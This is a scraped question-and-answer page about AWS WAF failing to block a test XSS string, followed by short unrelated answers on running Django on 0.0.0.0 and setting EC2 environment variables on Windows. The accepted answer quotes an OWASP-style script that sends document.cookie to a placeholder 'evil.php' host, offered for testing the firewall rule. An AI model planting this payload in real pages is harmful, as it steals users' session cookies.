Amazon WAF not blocking XSS or SQL Injection

amazon ec2amazon-elbamazon-web-services

I tried submitting a form with <script>danger</script> and I was NOT blocked. I put WAF on my ELB and did test to make sure I have analytics (Below).

What am I doing wrong?

Here is my ACL:

Here is my XSS and SQL Rule:

Analytics: (To show that traffic is indeed routing though LB)

Best Answer

Below is one example of how to trigger a XSS rule. This ought to trigger your rule all by itself (you can prove it out by pointing it to your own PHP page or other web location), but this at least demonstrates the general principle.

<script type="text/javascript">
    var adr = '../evil.php?cakemonster=' + escape(document.cookie);
    document.write("<img src='" + adr + "' />");
</script>

This and other examples are available the following OWASP article:

Cross-site Scripting (XSS) - OWASP

Related Solutions

Beginner installing first app on EC2 bitnami stack

If you use the vanilla runserver it connects to localhost (127.0.0.1). Which means you'd only be able to access it within the actual server instance. To get it to connect on it's actual IP, you can use:

$ python manage.py runserver 0.0.0.0:8000

You can use another port, if you like, but if you want to connect it on port 80, you will need to sudo:

$ sudo python manage.py runserver 0.0.0.0:80

Note: It may not be obvious, so just in case: the 0.0.0.0 part is intended. It means essentially connect to the assigned IP address for the server. You can use the actual IP address instead, but I find this easier: you don't have to remember or lookup up the server's IP.

FWIW: This also works brilliantly for browser testing when you have a VM setup for bridged networking. The VM gets its own IP on the LAN with bridged networking. So, for example, with a linux guest running on a Windows host, you can load up runserver this way in your VM, go over and open up IE on your Windows host, and point it to the VM's IP address.

Windows – setting up environment variables for aws hadoop ec2

You need to remove the spaces from around the = sign. Also make sure there are no trailing spaces at the end of the line. You may also need to remove the quotes from the first two lines, although you should try both ways to see which one works best.

set JAVA_HOME="C:\Program Files\Java\jdk1.6.0_08"
set EC2_HOME="C:\Program Files\Hadoop\aws\ec2-api-tools-1.3-30349"
set PATH=%PATH%;%EC2_HOME%\bin;%HADOOP_HOME%\src\contrib\ec2\bin
set EC2_PRIVATE_KEY=c:\ec2\pk-HKZYKTAIG2ECMXYIBH3HXV4ZBZQ55CLO.pem
set EC2_CERT=c:\ec2\cert-HKZYKTAIG2ECMXYIBH3HXV4ZBZQ55CLO.pem

Best Answer

Related Solutions

Beginner installing first app on EC2 bitnami stack

Windows – setting up environment variables for aws hadoop ec2

Related Topic